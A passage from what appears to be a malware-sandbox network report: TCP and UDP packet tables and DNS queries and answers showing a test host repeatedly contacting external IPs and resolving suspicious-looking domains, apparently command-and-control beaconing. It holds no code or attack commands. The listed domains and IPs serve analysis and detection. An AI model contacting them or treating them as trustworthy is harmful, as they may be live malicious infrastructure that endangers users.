                                                                                                                                              Nov 28, 2024 18:57:07.316340923 CET8049716217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:07.316680908 CET4971680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:07.324217081 CET4971680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:07.625957012 CET8049716217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:07.627374887 CET8049716217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:07.627422094 CET8049716217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:07.627646923 CET4971680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:08.831634045 CET4971680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:09.849289894 CET4971780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:10.151204109 CET8049717217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:10.151454926 CET4971780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:10.159029961 CET4971780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:10.460628033 CET8049717217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:10.461786032 CET8049717217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:10.461833954 CET8049717217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:10.462058067 CET4971780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:11.674784899 CET4971780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:12.692502975 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:12.994371891 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:12.994574070 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:13.002302885 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:13.002372980 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:13.304210901 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.304259062 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.304289103 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.304507971 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.304550886 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.304580927 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.332902908 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.332958937 CET8049718217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:13.333168983 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:14.517956018 CET4971880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:15.535572052 CET4971980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:15.837568998 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:15.837857962 CET4971980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:15.842971087 CET4971980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:16.145030975 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:16.147953987 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:16.148065090 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:16.148081064 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:16.148092985 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:16.148350000 CET4971980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:16.151879072 CET4971980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 18:57:16.453485012 CET8049719217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:21.701405048 CET4972080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:21.874596119 CET804972043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:21.874907970 CET4972080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:21.882464886 CET4972080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:22.056123018 CET804972043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:22.056170940 CET804972043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:22.056431055 CET4972080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:23.390935898 CET4972080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:24.408577919 CET4972180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:24.582293034 CET804972143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:24.582513094 CET4972180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:24.592784882 CET4972180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:24.766431093 CET804972143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:24.766479015 CET804972143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:24.766674995 CET4972180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:26.109061003 CET4972180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:27.128518105 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:27.304936886 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.305208921 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:27.312975883 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:27.313054085 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:27.489590883 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.489638090 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.489670992 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.489700079 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.489928961 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.489970922 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.490003109 CET804972243.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:27.490247965 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:28.827219963 CET4972280192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:29.844789982 CET4972380192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:30.018074036 CET804972343.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:30.018354893 CET4972380192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:30.023478985 CET4972380192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:30.196824074 CET804972343.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:30.196871042 CET804972343.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:30.197189093 CET4972380192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:30.199203968 CET4972380192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 18:57:30.372452974 CET804972343.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.239192009 CET4972480192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:36.401983976 CET804972423.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.402240992 CET4972480192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:36.411322117 CET4972480192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:36.574371099 CET804972423.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.575314999 CET804972423.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.575350046 CET804972423.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.575571060 CET4972480192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:37.919018030 CET4972480192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:38.939055920 CET4972580192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:39.102118969 CET804972523.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:39.102549076 CET4972580192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:39.110080004 CET4972580192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:39.273001909 CET804972523.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:39.273735046 CET804972523.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:39.273751974 CET804972523.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:39.273947001 CET4972580192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:40.621516943 CET4972580192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:41.639605999 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:41.802635908 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.802856922 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:41.810581923 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:41.810650110 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:41.974168062 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.974210978 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.974241018 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.974314928 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.975275993 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.975322962 CET804972623.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:41.975783110 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:43.324057102 CET4972680192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.341593027 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.504719019 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:44.505029917 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.510132074 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.672991991 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:44.673744917 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:44.673791885 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:44.673827887 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:44.673981905 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.673983097 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.677258015 CET4972780192.168.11.2023.225.34.75
                                                                                                                                              Nov 28, 2024 18:57:44.840094090 CET804972723.225.34.75192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:09.933305979 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:10.089950085 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:10.090221882 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:10.095244884 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:10.251962900 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:13.152136087 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:13.153018951 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:13.153244972 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:13.154499054 CET4976580192.168.11.20172.67.149.53
                                                                                                                                              Nov 28, 2024 19:02:13.311158895 CET8049765172.67.149.53192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.172293901 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.473951101 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.474169970 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.481478930 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:18.783077002 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785362005 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785432100 CET8049766217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:18.785617113 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:19.982295036 CET4976680192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:20.999771118 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.301629066 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.301868916 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.309232950 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:21.611066103 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.611957073 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.611989975 CET8049767217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:21.612261057 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:22.825443029 CET4976780192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:23.842914104 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.144526958 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.144690990 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152230024 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152314901 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.152358055 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:24.454066038 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454137087 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454165936 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454195976 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454225063 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.454530954 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.456875086 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.456921101 CET8049768217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:24.457097054 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:25.652913094 CET4976880192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.670499086 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.972120047 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:26.972338915 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:26.977296114 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.278995037 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284579992 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284636021 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284667969 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284699917 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:27.284955025 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.284955025 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.288223028 CET4976980192.168.11.20217.70.184.50
                                                                                                                                              Nov 28, 2024 19:02:27.589781046 CET8049769217.70.184.50192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.294267893 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.467453003 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.467664003 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.475155115 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:32.648438931 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.648485899 CET804977043.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:32.648705006 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:33.979247093 CET4977080192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:34.998092890 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.171233892 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.171381950 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.178930044 CET4977180192.168.11.2043.153.84.190
                                                                                                                                              Nov 28, 2024 19:02:35.352215052 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.352232933 CET804977143.153.84.190192.168.11.20
                                                                                                                                              Nov 28, 2024 19:02:35.352497101 CET4977180192.168.11.2043.153.84.190

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 28, 2024 18:56:48.689481020 CET4916053192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:56:48.869124889 CET53491601.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:06.334657907 CET5923253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:57:07.012403965 CET53592321.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:21.160609007 CET6009953192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:57:21.699548006 CET53600991.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:35.203305006 CET5035053192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:57:36.216367006 CET5035053192.168.11.209.9.9.9
                                                                                                                                              Nov 28, 2024 18:57:36.237030029 CET53503501.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:36.708849907 CET53503509.9.9.9192.168.11.20
                                                                                                                                              Nov 28, 2024 18:57:49.685553074 CET5536553192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:57:49.868767023 CET53553651.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:58:03.415848017 CET5389553192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:58:03.599015951 CET53538951.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:58:17.164695024 CET5416653192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:58:17.649842024 CET53541661.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 18:58:31.784601927 CET5135453192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 18:58:32.022288084 CET53513541.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:04.343755007 CET5881753192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:04.525433064 CET53588171.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:12.577594042 CET5006253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:13.588139057 CET5006253192.168.11.209.9.9.9
                                                                                                                                              Nov 28, 2024 19:00:14.603526115 CET5006253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:16.618680954 CET5006253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:16.618680954 CET5006253192.168.11.209.9.9.9
                                                                                                                                              Nov 28, 2024 19:00:17.410501003 CET53500621.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:17.410537958 CET53500621.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:17.410562992 CET53500621.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:17.418317080 CET5006253192.168.11.209.9.9.9
                                                                                                                                              Nov 28, 2024 19:00:18.431832075 CET5556453192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:18.471460104 CET53500629.9.9.9192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:18.590301037 CET53555641.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:18.591193914 CET5556453192.168.11.209.9.9.9
                                                                                                                                              Nov 28, 2024 19:00:18.754657030 CET53555649.9.9.9192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:19.632174969 CET53500629.9.9.9192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:25.792195082 CET5921753192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:26.002559900 CET53592171.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:40.742837906 CET5788253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:40.965419054 CET53578821.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:00:56.242736101 CET5017553192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:00:56.440644026 CET53501751.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:01:10.749927044 CET5718853192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:01:11.390691996 CET53571881.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:01:25.122051954 CET6079253192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:01:25.311614037 CET53607921.1.1.1192.168.11.20
                                                                                                                                              Nov 28, 2024 19:01:39.509836912 CET5429353192.168.11.201.1.1.1
                                                                                                                                              Nov 28, 2024 19:01:39.822860956 CET53542931.1.1.1192.168.11.20

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                              Nov 28, 2024 18:56:48.689481020 CET192.168.11.201.1.1.10xdd65Standard query (0)www.1win-moldovia.funA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:06.334657907 CET192.168.11.201.1.1.10x1f03Standard query (0)www.akravchenko.devA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:21.160609007 CET192.168.11.201.1.1.10xa31dStandard query (0)www.hubeisuizhou.netA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:35.203305006 CET192.168.11.201.1.1.10x4000Standard query (0)www.bashei.topA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:36.216367006 CET192.168.11.209.9.9.90x4000Standard query (0)www.bashei.topA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:49.685553074 CET192.168.11.201.1.1.10xc171Standard query (0)www.gfdgdfery.xyzA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:03.415848017 CET192.168.11.201.1.1.10x9259Standard query (0)www.healthsolutions.topA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:17.164695024 CET192.168.11.201.1.1.10xf8fStandard query (0)www.affilamark.buzzA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:31.784601927 CET192.168.11.201.1.1.10xecd9Standard query (0)www.shedoes.topA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:04.343755007 CET192.168.11.201.1.1.10xd36bStandard query (0)www.torkstallningar.shopA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:12.577594042 CET192.168.11.201.1.1.10x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:13.588139057 CET192.168.11.209.9.9.90x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:14.603526115 CET192.168.11.201.1.1.10x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:16.618680954 CET192.168.11.201.1.1.10x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:16.618680954 CET192.168.11.209.9.9.90x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:17.418317080 CET192.168.11.209.9.9.90x1763Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:18.431832075 CET192.168.11.201.1.1.10x4f64Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:18.591193914 CET192.168.11.209.9.9.90x4f64Standard query (0)www.aflaksokna.comA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:25.792195082 CET192.168.11.201.1.1.10xbcd3Standard query (0)www.claudpinheiro.onlineA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:40.742837906 CET192.168.11.201.1.1.10xac55Standard query (0)www.slwmarketing.onlineA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:00:56.242736101 CET192.168.11.201.1.1.10xbee3Standard query (0)www.56435.netA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:10.749927044 CET192.168.11.201.1.1.10x6e28Standard query (0)www.tekilla.wtfA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:25.122051954 CET192.168.11.201.1.1.10x8347Standard query (0)www.tyai36.topA (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 19:01:39.509836912 CET192.168.11.201.1.1.10x8ff5Standard query (0)www.homebizsuccess.blogA (IP address)IN (0x0001)false

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                              Nov 28, 2024 18:56:48.869124889 CET1.1.1.1192.168.11.200xdd65No error (0)www.1win-moldovia.fun172.67.149.53A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:56:48.869124889 CET1.1.1.1192.168.11.200xdd65No error (0)www.1win-moldovia.fun104.21.47.164A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:07.012403965 CET1.1.1.1192.168.11.200x1f03No error (0)www.akravchenko.devwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:07.012403965 CET1.1.1.1192.168.11.200x1f03No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:21.699548006 CET1.1.1.1192.168.11.200xa31dNo error (0)www.hubeisuizhou.net43.153.84.190A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:36.237030029 CET1.1.1.1192.168.11.200x4000No error (0)www.bashei.top23.225.34.75A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:36.708849907 CET9.9.9.9192.168.11.200x4000No error (0)www.bashei.top23.225.34.75A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:49.868767023 CET1.1.1.1192.168.11.200xc171No error (0)www.gfdgdfery.xyz104.21.53.93A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:57:49.868767023 CET1.1.1.1192.168.11.200xc171No error (0)www.gfdgdfery.xyz172.67.211.54A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:03.599015951 CET1.1.1.1192.168.11.200x9259No error (0)www.healthsolutions.top13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                              Nov 28, 2024 18:58:03.599015951 CET1.1.1.1192.168.11.200x9259No error (0)www.healthsolutions.top76.223.54.146A (IP address)IN (0x0001)false
